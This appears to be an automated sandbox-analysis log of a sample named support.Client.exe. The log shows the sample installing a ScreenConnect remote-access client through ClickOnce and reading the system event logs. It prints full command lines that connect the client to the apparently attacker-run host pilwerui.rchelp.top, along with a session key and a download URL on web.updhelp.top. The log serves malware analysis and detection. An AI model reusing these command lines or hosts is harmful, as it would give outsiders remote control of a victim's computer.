                Source: dfsvc.exe, 00000002.00000002.3937277044.000001C1FEFC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configGfi
                Source: dfsvc.exe, 00000002.00000002.3937277044.000001C1FEFC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.top/Bin/ScreenConnect.WindowsFileManager.exe.configQfg
                Source: dfsvc.exe, 00000002.00000002.3921451450.000001C1E3D7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://web.updhelp.topxz
                Source: unknownNetwork traffic detected: HTTP traffic on port 60852 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60856 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60854 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60858 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60851
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60859
                Source: unknownNetwork traffic detected: HTTP traffic on port 60842 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60858
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60857
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60856
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60855
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60854
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60853
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60852
                Source: unknownNetwork traffic detected: HTTP traffic on port 60849 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60847 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60851 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60849
                Source: unknownNetwork traffic detected: HTTP traffic on port 60855 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60853 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60859 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 60843 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60847
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60843
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60842
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Jump to dropped file
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1Jump to dropped file

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Reads the Security eventlog
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                Reads the System eventlog
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                System Summary

                barindex
                Detected potential unwanted application
                Source: support.Client.exePE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\user.config
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 964 -ip 964
                Source: support.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                Source: ScreenConnect.WindowsBackstageShell.exe.2.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
                Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: ScreenConnect.Windows.dll.2.dr, WindowsExtensions.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: ScreenConnect.ClientService.dll.2.dr, WindowsLocalUserExtensions.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                Source: classification engineClassification label: mal63.evad.winEXE@22/66@2/2
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\DeploymentJump to behavior
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3304:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess964
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\DeploymentJump to behavior
                Source: support.Client.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                Source: C:\Users\user\Desktop\support.Client.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: support.Client.exeReversingLabs: Detection: 26%
                Source: unknownProcess created: C:\Users\user\Desktop\support.Client.exe "C:\Users\user\Desktop\support.Client.exe"
                Source: C:\Users\user\Desktop\support.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 964 -ip 964
                Source: C:\Users\user\Desktop\support.Client.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 800
                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k DevicesFlow -s DevicesFlowUserSvc
                Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WFDSConMgrSvc
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe"
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20Session" "1"
                Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20Session" "1"
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe" "RunRole" "9515c91f-1be5-4b93-b357-5a2d77e27f0d" "User"
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe" "RunRole" "67690a9d-de46-40e6-b1a1-8264d8889408" "System"
                Source: C:\Users\user\Desktop\support.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe"Jump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 964 -ip 964Jump to behavior
                Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 964 -s 800Jump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pilwerui.rchelp.top&p=8880&s=577cfc54-82b0-4777-83f3-37207b6e5fc8&k=BgIAAACkAABSU0ExAAgAAAEAAQCFVe49RH8w3PHHeO1qVSBr4d2sU0V6TqcGbDS6EEXrvVeV3soat%2b%2be7pjtKgmoYVSxtAgqBJFx3x%2bu%2fgeS2gMoW6pxHqHTQdkVPR3tWAED4PaXMyxSCsVfvS5x%2bD6HmCLs68MhV46R8MZKmo1TFlrWJa1YjjBBiNyTHb6vMp5bwAw6SBn7qSa3OLCFvKac77ooLhGXIKHPll7r9fHyHomHZ7Cy6UiZo%2fLH1m0xtJUlwQCrw8XCJdG%2ffBozmN8eL%2b%2bm0Fofhb08PSqX8fRwaZBpCsqRtXK2fd128aH7mu%2be2Q2vOc7WrnUjiGs7o7fZ9oSw384B%2f9gNelOJnoEsAbyt&r=&i=Untitled%20Session" "1"
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe" "RunRole" "9515c91f-1be5-4b93-b357-5a2d77e27f0d" "User"
                Source: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\QXKLWJQ4.0T8\8LWK3LW6.VGO\scre..tion_25b0fbb6ef7eb094_0018.0004_300a02b9f07724fb\ScreenConnect.WindowsClient.exe" "RunRole" "67690a9d-de46-40e6-b1a1-8264d8889408" "System"
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: dfshim.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\support.Client.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_1_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: virtdisk.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: diagnosticdatasettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coreprivacysettingsstore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
